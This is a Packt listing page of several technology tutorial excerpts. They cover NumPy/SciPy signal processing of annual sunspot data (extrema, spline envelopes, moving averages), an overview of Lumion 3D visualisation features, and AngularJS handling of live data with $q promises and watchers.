12 Jun 2014
6 min read
Save for later

Signal Processing Techniques

Packt
12 Jun 2014
6 min read
(For more resources related to this topic, see here.) Introducing the Sunspot data Sunspots are dark spots visible on the Sun's surface. This phenomenon has been studied for many centuries by astronomers. Evidence has been found for periodic sunspot cycles. We can download up-to-date annual sunspot data from http://www.quandl.com/SIDC/SUNSPOTS_A-Sunspot-Numbers-Annual. This is provided by the Belgian Solar Influences Data Analysis Center. The data goes back to 1700 and contains more than 300 annual averages. In order to determine sunspot cycles, scientists successfully used the Hilbert-Huang transform (refer to http://en.wikipedia.org/wiki/Hilbert%E2%80%93Huang_transform). A major part of this transform is the so-called Empirical Mode Decomposition (EMD) method. The entire algorithm contains many iterative steps, and we will cover only some of them here. EMD reduces data to a group of Intrinsic Mode Functions (IMF). You can compare this to the way Fast Fourier Transform decomposes a signal in a superposition of sine and cosine terms. Extracting IMFs is done via a sifting process. The sifting of a signal is related to separating out components of a signal one at a time. The first step of this process is identifying local extrema. We will perform the first step and plot the data with the extrema we found. Let's download the data in CSV format. We also need to reverse the array to have it in the correct chronological order. The following code snippet finds the indices of the local minima and maxima respectively: mins = signal.argrelmin(data)[0] maxs = signal.argrelmax(data)[0] Now we need to concatenate these arrays and use the indices to select the corresponding values. The following code accomplishes that and also plots the data: import numpy as np import sys import matplotlib.pyplot as plt from scipy import signal data = np.loadtxt(sys.argv[1], delimiter=',', usecols=(1,), unpack=True,skiprows=1) #reverse order data = data[::-1] mins = signal.argrelmin(data)[0] maxs = signal.argrelmax(data)[0] extrema = np.concatenate((mins, maxs)) year_range = np.arange(1700, 1700 + len(data)) plt.plot(1700 + extrema, data[extrema], 'go') plt.plot(year_range, data) plt.show() We will see the following chart: In this plot, you can see the extrema is indicated with dots. Sifting continued The next steps in the sifting process require us to interpolate with a cubic spline of the minima and maxima. This creates an upper envelope and a lower envelope, which should surround the data. The mean of the envelopes is needed for the next iteration of the EMD process. We can interpolate minima with the following code snippet: spl_min = interpolate.interp1d(mins, data[mins], kind='cubic') min_rng = np.arange(mins.min(), mins.max()) l_env = spl_min(min_rng) Similar code can be used to interpolate the maxima. We need to be aware that the interpolation results are only valid within the range over which we are interpolating. This range is defined by the first occurrence of a minima/maxima and ends at the last occurrence of a minima/maxima. Unfortunately, the interpolation ranges we can define in this way for the maxima and minima do not match perfectly. So, for the purpose of plotting, we need to extract a shorter range that lies within both the maxima and minima interpolation ranges. Have a look at the following code: import numpy as np import sys import matplotlib.pyplot as plt from scipy import signal from scipy import interpolate data = np.loadtxt(sys.argv[1], delimiter=',', usecols=(1,), unpack=True,skiprows=1) #reverse order data = data[::-1] mins = signal.argrelmin(data)[0] maxs = signal.argrelmax(data)[0] extrema = np.concatenate((mins, maxs)) year_range = np.arange(1700, 1700 + len(data)) spl_min = interpolate.interp1d(mins, data[mins], kind='cubic') min_rng = np.arange(mins.min(), mins.max()) l_env = spl_min(min_rng) spl_max = interpolate.interp1d(maxs, data[maxs], kind='cubic') max_rng = np.arange(maxs.min(), maxs.max()) u_env = spl_max(max_rng) inclusive_rng = np.arange(max(min_rng[0], max_rng[0]), min(min_rng[-1],max_rng[-1])) mid = (spl_max(inclusive_rng) + spl_min(inclusive_rng))/2 plt.plot(year_range, data) plt.plot(1700 + min_rng, l_env, '-x') plt.plot(1700 + max_rng, u_env, '-x') plt.plot(1700 + inclusive_rng, mid, '--') plt.show() The code produces the following chart: What you see is the observed data, with computed envelopes and mid line. Obviously, negative values don't make any sense in this context. However, for the algorithm we only need to care about the mid line of the upper and lower envelopes. In these first two sections, we basically performed the first iteration of the EMD process. The algorithm is a bit more involved, so we will leave it up to you whether or not you want to continue with this analysis on your own. Moving averages Moving averages are tools commonly used to analyze time-series data. A moving average defines a window of previously seen data that is averaged each time the window slides forward one period. The different types of moving average differ essentially in the weights used for averaging. The exponential moving average, for instance, has exponentially decreasing weights with time. This means that older values have less influence than newer values, which is sometimes desirable. We can express an equal-weight strategy for the simple moving average as follows in the NumPy code: weights = np.exp(np.linspace(-1., 0., N)) weights /= weights.sum() A simple moving average uses equal weights which, in code, looks as follows: def sma(arr, n): weights = np.ones(n) / n return np.convolve(weights, arr)[n-1:-n+1] The following code plots the simple moving average for the 11- and 22-year sunspot cycle: import numpy as np import sys import matplotlib.pyplot as plt data = np.loadtxt(sys.argv[1], delimiter=',', usecols=(1,), unpack=True, skiprows=1) #reverse order data = data[::-1] year_range = np.arange(1700, 1700 + len(data)) def sma(arr, n): weights = np.ones(n) / n return np.convolve(weights, arr)[n-1:-n+1] sma11 = sma(data, 11) sma22 = sma(data, 22) plt.plot(year_range, data, label='Data') plt.plot(year_range[10:], sma11, '-x', label='SMA 11') plt.plot(year_range[21:], sma22, '--', label='SMA 22') plt.legend() plt.show() In the following plot, we see the original data and the simple moving averages for 11- and 22-year periods. As you can see, moving averages are not a good fit for this data; this is generally the case for sinusoidal data. Summary This article gave us examples of signal processing and time series analysis. We looked at shifting continued that performs the first iteration of the EMD process. We also learned about Moving averages, which are tools commonly used to analyze time-series data. Resources for Article: Further resources on this subject: Advanced Indexing and Array Concepts [Article] Fast Array Operations with NumPy [Article] Move Further with NumPy Modules [Article]
Read more
  • 0
  • 0
  • 4085

article-image-unleashing-powers-lumion
Packt
12 Jun 2014
22 min read
Save for later

Unleashing the powers of Lumion

Packt
12 Jun 2014
22 min read
Lumion supports a direct import of SketchUp files, which means that we don't need to use any special format to have our 3D model in Lumion. But if you are working with modeling packages, such as 3ds Max, Maya, and Blender, you need to use a different approach by exporting a COLLADA or FBX file as these two are the best formats to work with Lumion. In particular situations, we may need to use our own animations. You may be aware that we can import basic animations in Lumion from 3D modeling packages such as 3ds Max. Lumion uses the flexibility of shortcuts to improve the control we have in the 3D world. Once we import a 3D model or even if we use a model from the Lumion library, we need to adjust the position, the orientation, and the scale of the 3D model. But keep in mind the importance of organizing your 3D world using layers as well. They are free and they will become very useful when we need to hide some objects to focus our attention on a specific detail or when we use the Hide layer and Show layer effect. At a certain point in our project, we will need to go back and undo a mistake or something that doesn't look as expected. Lumion offers you a very limited undo option. When working with Lumion, and in particular, when organizing our 3D world, and arranging and adjusting the 3D models, we might find the possibility of locking the 3D model's position to be useful. This helps us to avoid selecting and unintentionally moving other, already placed 3D models. From the beginning of our project with Lumion, it is very important for us to organize and categorize our 3D world. Sometimes we may not do this straightaway, and only after importing some 3D models and adding some content from the Lumion library we realize the need to organize our project in a better way. We can use layers and assign the existing 3D models to a new layer. Over the course of a project, it is very common to have certain 3D models updated, and we need to update those 3D models into our Lumion project. This can be a rather daunting task, taking into account that most of the time these updates in the 3D models happen after we have already assigned materials to the imported 3D model. Sometimes during the project, we may face a radical change in a 3D model we have already imported into the Lumion project. The worst scenario is reassigning all the materials to the new 3D model and perhaps relocating to the correct place. However, Lumion has an option to help us with this and to avoid reassigning all the materials or at least not all of them, and the 3D models will stay in exactly the same place. After importing a 3D model we created in our favorite 3D modeling package, it is likely that we want to enhance the look and the environment of the project by using additional 3D models. The lack of detail and content will definitely create a lifeless and dull image or video. Lumion will not only help you learn how to place content from the Lumion library, but also how you can discover what you need. Something indispensable for a smooth workflow in every project are the copy and paste tools. Imagine having to go to the import library to place the 3D model again and assigning a material every single time we need a 3D model. Lumion doesn't have a standard copy and paste tool that we can find in most software, but there is a way to emulate this feature. Lumion will help you copy a 3D model already present in your scene and avoid the trouble of going back to the Lumion library and placing a 3D model already present in your project. Removing or deleting a 3D model is a part of the process of any project. This can be particularly tricky when our 3D world is crowded with 3D models and there is a possibility of selecting and deleting the wrong 3D model. Nevertheless, Lumion does a great job in this area because it protects you from deleting something by mistake. All projects are different, and this typically brings in unique challenges. Sometimes, a building or the environment are really intricate, and this can cause difficulties when we are placing 3D models from the Lumion library. Lumion recognizes surfaces and will avoid intersecting them with any 3D model you want to place in your world. However, there are times when this feature may be in our way and cause difficulties when placing a 3D model. A project needs life, but placing dozens of models one by one is a massive task. Lumion helps us to populate our 3D world by providing the option to place more than one copy at a time. By means of a shortcut, we can place 10 copies of a 3D model. The world we live in is bursting with diversity and variety. Consequently, our eyes are incredible in picking up repetitions. Sometimes, even if we cannot explain why, we know something is wrong with a picture because it doesn't look natural. When we are working on a big project, such repetitions stand out almost immediately. We can use a feature in Lumion that gives us the ability to randomize the size of 3D models while placing them. With more than 2,000 models, we can say that Lumion has everything we need to use in our project. Although Lumion has predefined models, it doesn't mean that we can't modify some basic options. We can modify simple settings such as color and texture, but keep in mind that this doesn't mean we can change these settings in every single 3D model. In almost every project, we have some autonomy to place the 3D models and organize the 3D world. Nevertheless, there are times when we really need more accuracy than one can get with the mouse. Lumion's coordinate system can assist us with this task. Typically, we focus our attention on selecting separate 3D models so that we can make exact and accurate adjustments. Eventually, we will need to do some alterations and modifications to multiple 3D objects. Lumion shows you how you can do this, along with a practical application. While working with selections in Lumion, every time we make a selection and transform the 3D model, we need to choose the correct category. There are particular occasions when we need to select and manipulate 3D models that belong to different categories. Lumion can select 3D models from different categories in one go. Initially, we may find Lumion very restrictive in the way it works with the content placed in our project because we need to select the correct category every time we want to work with a 3D model. However, we can bypass these restrictions by using the option to select and move any 3D model in our world without selecting a category. As mentioned earlier, the world we live is full of diversity and randomness; however, almost on every project, there are some situations when we need to place the content in an orderly way. A quick example is when we need to place garden lamps along a path and they need to be spaced equally. This can be done in Lumion. Lumion is a unique application not only because of what we can do with an incredible quality, but also because we have features that initially may not seem beneficial at all until we work on a project where we see a practical application. One example is when we need to align the orientations of different 3D models, Lumion shows not only how to use it, but also how to apply it in a practical situation. While populating and arranging our project, there are times when a snapping tool comes in handy. We can always use the move and height tools to place the 3D model at the top or next to another 3D model, but Lumion allow us to snap multiple 3D models to the same position in an easy way. While placing content in our project, we are usually concerned about the location of the 3D model. However, later we realize that our project is too uniform, and this is easily spotted with plants, trees, flowers, and other objects. Instead of selecting an individual 3D model and manually rotating, relocating, and rescaling it to bring some variety to our project, Lumion helps us out with a fantastic feature to randomize the orientation, position, and scale of the 3D models. Even in the most perfect project, we can find variations in the terrains and in the building, it's natural that we find inclined surfaces. Rotate on model is a feature in Lumion that allows us to snap to the surface of other 3D models when we are moving a 3D model. We can use this to adjust a car on a slope or a book on a chair. While changing the 3D model's rotation, we can see that when the 3D model is getting closer to the 90 degree angle, it will snap automatically. This is fine, perhaps, in most cases, but there are times when we need to do some precise adjustments and this option can be helpful in our way. Lumion deactivates this feature temporarily. An initial tactic to sculpt and shape the terrain is to use the terrain brushes available with Lumion. Lumion is not an application like ZBrush, but it does well with the brushes provided to sculpt the terrain, and they are not difficult to master. Lumion explains how we can use them and some practical applications in real projects. We know how to use the five brushes to sculpt the terrain and the different results of each one of them. However, we are not limited to the standard values used in each brush because Lumion allows us to change two settings to help us sculpt the terrain. This control is useful when we need to add details at a small or large scale. Some projects don't require any specific terrain from us, but at the same time, we don't want to use a flat terrain. In the Terrain menu, we can find some tools that help us to quickly create mountains and modify other characteristics of our project. When we start a new project in Lumion, we can start using nine different presets. They sort of work as a shortcut to help us get the appearance we want for our project. Most of the time, we may use the Grass preset, but that doesn't mean we get stuck with the landscape presented. We know how we can sculpt the terrain, but we can do more than that in Lumion and see how we can completely change the aspect of the landscape. Although we have 20 presets to entirely change the look of the landscape, this doesn't mean that we cannot change any settings and actually paint the landscape. Lumion explores the Paint submenu and shows how we can use Lumion's textures to paint and change the landscape completely. Perhaps you don't want the trouble of sculpting the terrain using the tools offered in Lumion. Truth be told, in some situations, it is easier and more productive to model the terrain outside Lumion and import that terrain along with the building. Lumion has fantastic material that blends the terrain we imported with the landscape. Another solution to create accurate terrains is by means of a heightmap. A heightmap is a texture with stored values that can be used, in this case, by Lumion that translates this 2D information into a 3D terrain. Lumion will help you to see how you can import a heightmap and save the terrain you created in Lumion as a heightmap file. It is remarkable how little things, such as defining the Sun's direction, have the most considerable amount of impact on a project. Throughout the production process, we may need to adjust the Sun's direction to have a clear view of the project; however, in due course, we will get to a point where we will need to define the final orientation that we are going to use to produce a still image or a movie. Setting up the Sun's direction and height is one of the simplest tasks in Lumion; however, by only using the Weather menu, we can start feeling that there is a lack of control over these settings. Fear not though! Lumion offers an effect that provides assistance to control the Sun in a way that can make all the difference when producing a video. Lumion will help you comprehend not only how you can modify the settings for the Sun, but will also provide you with a practical example of how you can apply this feature in any project. A shadow can be defined as an area that is not or is only partially illuminated because an object is obstructing its source of illumination. It is true that we don't think that shadows are important and essential elements to create a good-looking scenario, but without them our project will be dull. Lumion is going to help us use the Shadow effect to tweak and correct the shadows in order to meet our requirements and the finishing look we want to accomplish. An additional aspect connected to the shadows in Lumion, and it happens in the real world too, is the influence of the sky over shadows. Taking a look at the shadows in any project, you can easily realize how a sunset or a midday scene can transform the color of the shadow. Lumion will show how to control and change the influence that skylight has on shadows. We have been working entirely with hard shadows. The Sun in our 3D world can produce these hard shadows, and they are called by this name because they have strong and well-defined edges with less transition between illumination and the shadow. Soft shadows can be produced by the Sun in certain circumstances, and the sky, likewise, can create these diffused shadows with soft edges. We can apply soft shadows to our project to enrich the final look. So far, we have been looking at how we can use the Weather menu to create an enjoyable environment for our exterior scenes. Lumion is also capable of producing beautiful interior scenes, but we need to work a little bit with the interior illumination before we can produce something that is presentable and eye-catching. For interior scenes, we can use the Global Illumination effect to improve the illumination that is either provided by the Sun or some artificial source of illumination. We can improve the interior look and illumination using Global Illumination. An element that can bring an extra touch to the final movie are the clouds. This is a component that does not always cross our mind when trying to attain a good-looking and realistic movie. Lumion provides us with a lot of freedom not only to change the appearance of the clouds, but also to animate and even create volume clouds to bring this fine-tuning to a different dimension. Fog is a natural phenomenon that can be added to our project, and it can really change a scene dramatically. With it, we can make a scene more mysterious or reproduce the haze where dust, smoke, and other dry particles obscure the clarity of the sky. With the Fog effect, we can achieve this and much more. The fact that we can add rain and snow, as easy as reading this sentence, really proves that Lumion is a powerful and versatile application. Adding rain or snow is something that we can easily achieve by adding two effects in the Photo or Movie mode. Lumion by default uses wind in any project you start. Once you add the first trees, you can see how they slowly move showing the effect of the wind. We can control the wind using the, yes you are right, the Foliage Wind effect. Another option to control the Sun is using a new feature introduced in Lumion Version 4. This option, that we can find under the Effects label, is called Sun study. It is an amazing feature that allows us to select any point on the planet and mimic the Sun in that location. However, there is much more that we can do with this effect. Lumion has more than 500 materials on hand and generally this is more than adequate. Still, Lumion is a very flexible application, and for this reason, you are not fixed with just these materials. We have the opportunity to use our own textures to create other materials. Lumion is not going to show you all the settings that you can use to tweak the material; instead, we are going to focus on how we can replace and adjust an outside texture. Making a 3D model invisible or hiding surfaces from our 3D model is something that we don't anticipate to do in every project. However, there are times when the Invisible material can be very handy, and Lumion demonstrates not only how to apply it, but also some specific situations that we may consider while using this material. Glass is essential in any project we work. From the glass in a complex window to a simple cup made of glass, this material has a deep impact on a still image and even more on a movie, helping us capture the light and reflections of the environment. Lumion has a glass material that can be used to create some of these materials. The Glass material can be manipulated to get a more realistic look. During the production, it is expected that we save the materials applied to the 3D models. This should be done for precaution purposes, in case something goes wrong or when we need to go back and forth with materials, without having to lose any settings. Lumion has an option to save the materials you applied to a 3D model and later on load them again, if necessary. There is another feature that Lumion is going to show you which will give you a chance to save a single material instead of material sets. There are different ways in which we can add water to our project. We can create an ocean as easily as reading this sentence, and the same is true when we need to add a body of water or create a swimming pool. However, what if we want to create a fountain? Let's go even further: can we create a river? Lumion will teach you how easy is to create a streaming water effect. Another beautiful and eye-catching effect is when we have glowing materials in our project. From light bulbs to TV screens, we can add an extra touch to our scene by using the Standard material to create this glow effect. Lumion will teach you not only how to add this glow, but also how you can use textures to produce interesting effects. After adding trees, bushes, and other plants, the next thing you should add to the project is some grass. Prior to Lumion Version 4, you had to be satisfied with the terrain's texture. We can also import some grass, though, the project would become very heavy. You can also add some grass from the Lumion library and adjust that grass in the best way possible. Now, Lumion provides an option to use realistic grass, bringing that whoa factor. Each material has a certain amount of reflection, and this is a setting that we can adjust in almost every material that we can find in Lumion. Taking into account that Lumion is a real-time application, it is natural that in some cases, the reflections don't meet our requirements in terms of accuracy. Lumion has an effect that we can apply to surfaces in our 3D model to improve these reflections. While applying and tweaking materials, you can cross a section in your 3D model where you can easily see some flickering. Although this should be avoided, there is an inbuilt setting in every Lumion material to correct this problem. Fire is a special effect that is accessible in Lumion and is one of those elements that can bring an ordinary scene to life. We may have a living room that per se is excellent with all the materials and light, but when we add fire to the fireplace, it completely transforms the room into a warm, comfortable, and welcoming living room. Alternatively, consider how the same living room can be changed to introduce a romantic scene when illuminated with candles and a fireplace. Lumion is aimed to help you apply fire and control it using the Edit properties menu. In addition to the solid and liquid elements in Lumion, we can find elements that we could label as non-solid. Lumion has a special section for these elements, opening with the smoke, passing all the way through dust, and then finishing with fog and water vapor. How we can place these elements in our project and a realistic application of some of them is what Lumion will teach you. Fountains have their distinctive place in Lumion, and there is a tab dedicated to different categories of fountains. We can separate this tab into two parts: standard fountains and fountains produced by a waterspray emitter. Lumion is aimed to show you where to find these fountains, how to place them in the scene, and also provide you with some useful applications. Falling leaves are an enjoyable extra touch that can improve our still image or movie. Nevertheless, like the preceding special effects, this one needs to be used in the correct amount. Too much can ruin the scene, making the viewer focus more on leaves passing through the screen than actually focus on the 3D model. We can add text to a movie or a still image using the Titles effect, but in some circumstances, we need a text element with some more flexibility. Sometimes, when working on a presentation of a project, we are required to show some additional information; this can be easily achieved using this fantastic feature available in Lumion. We can add text to our project in the Build mode. A clip plane is an object that can be added to a scene and later used in the Movie mode, and it can be animated to produce a kind of reveling effect. Initially, it may seem a little bit confusing, you will understand how to apply it to your scene and animate this plane. It is time to move from special effects, such as fire, smoke, and water that we can add to the scene and move towards effects that we can apply in both the Movie and Photo modes. Lumion gives you an overview of how general effects work, how you can stack them in either the Movie or Photo mode, and how you can control them. It is logical that all the effects available in Lumion are applied using either the Movie or Photo mode. The reason for this is that if all those effects were applied to the Build mode, they would have a massive impact on the performance of the viewport, slowing down our workflow. However, Lumion likes to provide you with the freedom needed to produce the best result possible, and in some situations, it could be useful to check the effects in the Build mode. Bloom is the halo effect caused principally by bright lights in the scene. In real world, the camera lenses we use can never focus perfectly, but this is not a problem under normal conditions. However, when there is an intensely bright light in the scene, these imperfections are perceptible and visible, and as a consequence, in the photo that we would shoot, the bright light will appear to bleed beyond its usual borders. Purple fringing, distortion, and blurred edges are a combination of errors called chromatic aberration. A simple explanation is that chromatic aberration happens when there is a failure on the part of lens to focus or bring all the wavelengths of colors to the same focal plane. As light travels through this lens, the different colors travel at different speeds and go to different places on the camera's sensor. With 3D cameras, this doesn't happen, but we can add chromatic aberration to our image or video, giving an extra touch of realism. The expression "color correction" has a fair number of different meanings. However, generally speaking, we can say that it is a means to repair problems with the color, and we do that by changing the color of a pixel to another color or by tweaking other settings. In Lumion, this means that we can use color correction to either achieve a certain look or to enhance the overall aspect and mood of an image or a movie. We can use this effect in Lumion and apply a few tips to help us not only to correct the color, but also perform some color grading.
Read more
  • 0
  • 0
  • 3454
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-working-live-data-and-angularjs
Packt
12 Jun 2014
14 min read
Save for later

Working with Live Data and AngularJS

Packt
12 Jun 2014
14 min read
(For more resources related to this topic, see here.) Big Data is a new field that is growing every day. HTML5 and JavaScript applications are being used to showcase these large volumes of data in many new interesting ways. Some of the latest client implementations are being accomplished with libraries such as AngularJS. This is because of its ability to efficiently handle and organize data in many forms. Making business-level decisions off of real-time data is a revolutionary concept. Humans have only been able to fathom metrics based off of large-scale systems, in real time, for the last decade at most. During this time, the technology to collect large amounts of data has grown tremendously, but the high-level applications that use this data are only just catching up. Anyone can collect large amounts of data with today's complex distributed systems. Displaying this data in different formats that allow for any level of user to digest and understand its meaning is currently the main portion of what the leading-edge technology is trying to accomplish. There are so many different formats that raw data can be displayed in. The trick is to figure out the most efficient ways to showcase patterns and trends, which allow for more accurate business-level decisions to be made. We live in a fast paced world where everyone wants something done in real time. Load times must be in milliseconds, new features are requested daily, and deadlines get shorter and shorter. The Web gives companies the ability to generate revenue off a completely new market and AngularJS is on the leading edge. This new market creates many new requirements for HTML5 applications. JavaScript applications are becoming commonplace in major companies. These companies are using JavaScript to showcase many different types of data from inward to outward facing products. Working with live data sets in client-side applications is a common practice and is the real world standard. Most of the applications today use some type of live data to accomplish some given set of tasks. These tasks rely on this data to render views that the user can visualize and interact with. There are many advantages of working with the Web for data visualization, and we are going to showcase how these tie into an AngularJS application. AngularJS offers different methods to accomplish a view that is in charge of elegantly displaying large amounts of data in very flexible and snappy formats. Some of these different methods feed directives' data that has been requested and resolved, while others allow the directive to maintain control of the requests. We will go over these different techniques of how to efficiently get live data into the view layer by creating different real-world examples. We will also go over how to properly test directives that rely on live data to achieve their view successfully. Techniques that drive directives Most standard data requirements for a modern application involve an entire view that depends on a set of data. This data should be dependent on the current state of the application. The state can be determined in different ways. A common tactic is to build URLs that replicate a snapshot of the application's state. This can be done with a combination of URL paths and parameters. URL paths and parameters are what you will commonly see change when you visit a website and start clicking around. An AngularJS application is made up of different route configurations that use the URL to determine which action to take. Each configuration will have an associated controller, template, and other forms of options. These configurations work in unison to get data into the application in the most efficient ways. AngularUI also offers its own routing system. This UI-Router is a simple system built on complex concepts, which allows nested views to be controlled by different state options. This concept yields the same result as ngRoute, which is to get data into the controller; however, UI-Router does it in a more eloquent way, which creates more options. AngularJS 2.0 will contain a hybrid router that utilizes the best of each. Once the controller gets the data, it feeds the retrieved data to the template views. The template is what holds the directives that are created to perform the view layer functionality. The controller feeds directives' data, which forces the directives to rely on the controllers to be in charge of the said data. This data can either be fed immediately after the route configurations are executed or the application can wait for the data to be resolved. AngularJS offers you the ability to make sure that data requests have been successfully accomplished before any controller logic is executed. The method is called resolving data, and it is utilized by adding the resolve functions to the route configurations. This allows you to write the business logic in the controller in a synchronous manner, without having to write callbacks, which can be counter-intuitive. The XHR extensions of AngularJS are built using promise objects. These promise objects are basically a way to ensure that data has been successfully retrieved or to verify whether an error has occurred. Since JavaScript embraces callbacks at the core, there are many points of failure with respect to timing issues of when data is ready to be worked with. This is where libraries such as the Q library come into play. The promise object allows the execution thread to resemble a more synchronous flow, which reduces complexity and increases readability. The $q library The $q factory is a lite instantiation of the formally accepted Q library (https://github.com/kriskowal/q). This lite package contains only the functions that are needed to defer JavaScript callbacks asynchronously, based on the specifications provided by the Q library. The benefits of using this object are immense, when working with live data. Basically, the $q library allows a JavaScript application to mimic synchronous behavior when dealing with asynchronous data requests or methods that are not thread blocked by nature. This means that we can now successfully write our application's logic in a way that follows a synchronous flow. ES6 (ECMAScript6) incorporates promises at its core. This will eventually alleviate the need, for many functions inside the $q library or the entire library itself, in AngularJS 2.0. The core AngularJS service that is related to CRUD operations is called $http. This service uses the $q library internally to allow the powers of promises to be used anywhere a data request is made. Here is an example of a service that uses the $q object in order to create an easy way to resolve data in a controller. Refer to the following code: this.getPhones = function() { var request = $http.get('phones.json'), promise; promise = request.then(function(response) { return response.data; },function(errorResponse){ return errorResponse; }); return promise; } Here, we can see that the phoneService function uses the $http service, which can request for all the phones. The phoneService function creates a new request object, that calls a then function that returns a promise object. This promise object is returned synchronously. Once the data is ready, the then function is called and the correct data response is returned. This service is best showcased correctly when used in conjunction with a resolve function that feeds data into a controller. The resolve function will accept the promise object being returned and will only allow the controller to be executed once all of the phones have been resolved or rejected. The rest of the code that is needed for this example is the application's configuration code. The config process is executed on the initialization of the application. This is where the resolve function is supposed to be implemented. Refer to the following code: var app = angular.module('angularjs-promise-example',['ngRoute']); app.config(function($routeProvider){ $routeProvider.when('/', { controller: 'PhoneListCtrl', templateUrl: 'phoneList.tpl.html', resolve: { phones: function(phoneService){ return phoneService.getPhones(); } } }).otherwise({ redirectTo: '/' }); }) app.controller('PhoneListCtrl', function($scope, phones) { $scope.phones = phones; }); A live example of this basic application can be found at http://plnkr.co/edit/f4ZDCyOcud5WSEe9L0GO?p=preview. Directives take over once the controller executes its initial context. This is where the $compile function goes through all of its stages and links directives to the controller's template. The controller will still be in charge of driving the data that is sitting inside the template view. This is why it is important for directives to know what to do when their data changes. How should data be watched for changes? Most directives are on a need-to-know basis about the details of how they receive the data that is in charge of their view. This is a separation of logic that reduces cyclomatic complexity in an application. The controllers should be in charge of requesting data and passing this data to directives, through their associated $scope object. Directives should be in charge of creating DOM based on what data they receive and when the data changes. There are an infinite number of possibilities that a directive can try to achieve once it receives its data. Our goal is to showcase how to watch live data for changes and how to make sure that this works at scale so that our directives have the opportunity to fulfill their specific tasks. There are three built-in ways to watch data in AngularJS. Directives use the following methods to carry out specific tasks based on the different conditions set in the source of the program: Watching an object's identity for changes Recursively watching all of the object's properties for changes Watching just the top level of an object's properties for changes Each of these methods has its own specific purpose. The first method can be used if the variable that is being watched is a primitive type. The second type of method is used for deep comparisons between objects. The third type is used to do a shallow watch on an array of any type or just on a normal object. Let's look at an example that shows the last two watcher types. This example is going to use jsPerf to showcase our logic. We are leaving the first watcher out because it only watches primitive types and we will be watching many objects for different levels of equality. This example sets the $scope variable in the app's run function because we want to make sure that the jsPerf test resets each data set upon initialization. Refer to the following code: app.run(function($rootScope) { $rootScope.data = [ {'bob': true}, {'frank': false}, {'jerry': 'hey'}, {'bargle':false}, {'bob': true}, {'bob': true}, {'frank': false}, {'jerry':'hey'},{'bargle': false},{'bob': true},{'bob': true},{'frank': false}]; }); This run function sets up our data object that we will watch for changes. This will be constant throughout every test we run and will reset back to this form at the beginning of each test. Doing a deep watch on $rootScope.data This watch function will do a deep watch on the data object. The true flag is the key to setting off a deep watch. The purpose of a deep comparison is to go through every object property and compare it for changes on every digest. This is an expensive function and should be used only when necessary. Refer to the following code: app.service('Watch', function($rootScope) { return { run: function() { $rootScope.$watch('data', function(newVal, oldVal) { },true); //the digest is here because of the jsPerf test. We are using thisrun function to mimic a real environment. $rootScope.$digest(); } }; }); Doing a shallow watch on $rootScope.data The shallow watch is called whenever a top-level object is changed in the data object. This is less expensive because the application does not have to traverse n levels of data. Refer to the following code: app.service('WatchCollection', function($rootScope) { return { run: function() { $rootScope.$watchCollection('data', function(n, o) { }); $rootScope.$digest(); } }; }); During each individual test, we get each watcher service and call its run function. This fires the watcher on initialization, and then we push another test object to the data array, which fires the watch's trigger function again. That is the end of the test. We are using jsperf.com to show the results. Note that the watchCollection function is much faster and should be used in cases where it is acceptable to shallow watch an object. The example can be found at http://jsperf.com/watchcollection-vs-watch/5. Refer to the following screenshot: This test implies that the watchCollection function is a better choice to watch an array of objects that can be shallow watched for changes. This test is also true for an array of strings, integers, or floats. This brings up more interesting points, such as the following: Does our directive depend on a deep watch of the data? Do we want to use the $watch function, even though it is slow and memory taxing? Is it possible to use the $watch function if we are using large data objects? The directives that have been used in this book have used the watch function to watch data directly, but there are other methods to update the view if our directives depend on deep watchers and very large data sets. Directives can be in charge There are some libraries that believe that elements can be in charge of when they should request data. Polymer (http://www.polymer-project.org/) is a JavaScript library that allows DOM elements to control how data is requested, in a declarative format. This is a slight shift from the processes that have been covered so far in this article, when thinking about what directives are meant for and how they should receive data. Let's come up with an actual use case that could possibly allow this type of behavior. Let's consider a page that has many widgets on it. A widget is a directive that needs a set of large data objects to render its view. To be more specific, lets say we want to show a catalog of phones. Each phone has a very large amount of data associated with it, and we want to display this data in a very clean simple way. Since watching large data sets can be very expensive, what will allow directives to always have the data they require, depending on the state of the application? One option is to not use the controller to resolve the Big Data and inject it into a directive, but rather to use the controller to request for directive configurations that tell the directive to request certain data objects. Some people would say this goes against normal conventions, but I say it's necessary when dealing with many widgets in the same view, which individually deal with large amounts of data. This method of using directives to determine when data requests should be made is only suggested if many widgets on a page depend on large data sets. To create this in a real-life example, let's take the phoneService function, which was created earlier, and add a new method to it called getPhone. Refer to the following code: this.getPhone = function(config) { return $http.get(config.url); }; Now, instead of requesting for all the details on the initial call, the original getPhones method only needs to return phone objects with a name and id value. This will allow the application to request the details on demand. To do this, we do not need to alter the getPhones method that was created earlier. We only need to alter the data that is supplied when the request is made. It should be noted that any directive that is requesting data should be tested to prove that it is requesting the correct data at the right time. Testing directives that control data Since the controller is usually in charge of how data is incorporated into the view, many directives do not have to be coupled with logic related to how that data is retrieved. Keeping things separate is always good and is encouraged, but in some cases, it is necessary that directives and XHR logic be used together. When these use cases reveal themselves in production, it is important to test them properly. The tests in the book use two very generic steps to prove business logic. These steps are as follows: Create, compile, and link DOM to the AngularJS digest cycle Test scope variables and DOM interactions for correct outputs Now, we will add one more step to the process. This step will lie in the middle of the two steps. The new step is as follows: Make sure all data communication is fired correctly AngularJS makes it very simple to allow additional resource related logic. This is because they have a built-in backend service mock, which allows many different ways to create fake endpoints that return structured data. The service is called $httpBackend.
Read more
  • 0
  • 0
  • 4310

article-image-building-web-application-php-and-mariadb-introduction-caching
Packt
11 Jun 2014
4 min read
Save for later

Building a Web Application with PHP and MariaDB - Introduction to caching

Packt
11 Jun 2014
4 min read
